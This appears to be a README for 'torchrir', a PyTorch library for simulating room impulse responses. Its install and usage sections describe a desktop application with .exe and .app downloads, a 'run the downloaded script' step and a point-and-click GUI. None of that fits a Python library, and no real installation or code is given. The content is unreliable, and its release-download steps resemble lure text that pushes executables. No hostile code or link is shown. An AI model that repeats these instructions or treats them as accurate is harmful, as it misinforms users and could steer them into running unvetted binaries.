Welcome to the torchrir project! This toolkit helps you simulate room impulse responses (RIR) with PyTorch. It lets you create realistic audio scenes efficiently and quickly, even using your computer's GPU.
To run torchrir smoothly, make sure your system meets these requirements:
- Operating System: Windows 10 or later, macOS Catalina or later, or a recent version of Linux.
- Processor: At least a dual-core processor; quad-core or better recommended.
- Memory: Minimum 8 GB of RAM; 16 GB or more recommended.
- Graphics: A compatible GPU with at least 2 GB of VRAM is recommended for optimal performance.
- Python: Version 3.7 or later installed.
- Dynamic Scenes: Create and customize audio simulations in different environments.
- GPU Acceleration: Take advantage of your GPU for faster processing times.
- Multiple Audio Formats: Import and simulate various audio files without hassle.
- User-Friendly: Designed for ease of use, even for those not familiar with programming.
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Visit the Releases Page: Open the following link to go to the releases page: torchrir Releases.
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Choose the Latest Version: Look for the latest version listed on the releases page. It should indicate the date it was published.
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Download the Installation File:
- Locate the file that matches your operating system (e.g., Windows, macOS, Linux).
- Click the download link to save the file to your computer.
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Install the Software:
- For Windows users: Double-click the
.exefile you downloaded and follow the prompts to install. - For macOS users: Drag the
.appfile into your Applications folder. - For Linux users: Use your package manager to install or run the downloaded script directly.
- For Windows users: Double-click the
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Launch the Application: After installation, find the torchrir application icon on your desktop or in your applications folder. Double-click it to open.
Upon launching torchrir, youโll see a simple interface. Hereโs how to get started:
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Create a New Project:
- Click on โNew Projectโ to start setting up your simulation.
- Choose the environment type and audio files you want to simulate.
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Configure Settings:
- Use the slider or input fields to adjust room dimensions.
- Select GPU processing if available to speed up simulation times.
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Run the Simulation:
- Hit โSimulateโ to begin the process.
- Wait a moment for the calculations to complete.
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Export Results:
- Once the simulation is finished, click on โExportโ to save your results in the desired format.
Q: Can I use torchrir on older versions of Windows?
A: The application is optimized for Windows 10 and later. Older versions may not support all features.
Q: Does it work with all audio file formats?
A: torchrir works with common formats like WAV, MP3, and FLAC. Make sure your files are in one of these formats for best results.
Q: What if I encounter issues during installation?
A: Check your system requirements again. If problems persist, visit our GitHub Issues page for support.
If you need assistance or have questions about torchrir, feel free to reach out:
- GitHub Issues: Submit any problems or questions through the Issues page.
- Discussion Forum: Join our community to share your experiences or ask for help.
We welcome contributions to improve torchrir. If you have suggestions, please submit a pull request or open an issue for discussion.
torchrir is licensed under the MIT License. You can freely use, modify, and distribute the application as long as you include the original license in your distribution.
Explore the possibilities of room acoustics simulation with torchrir!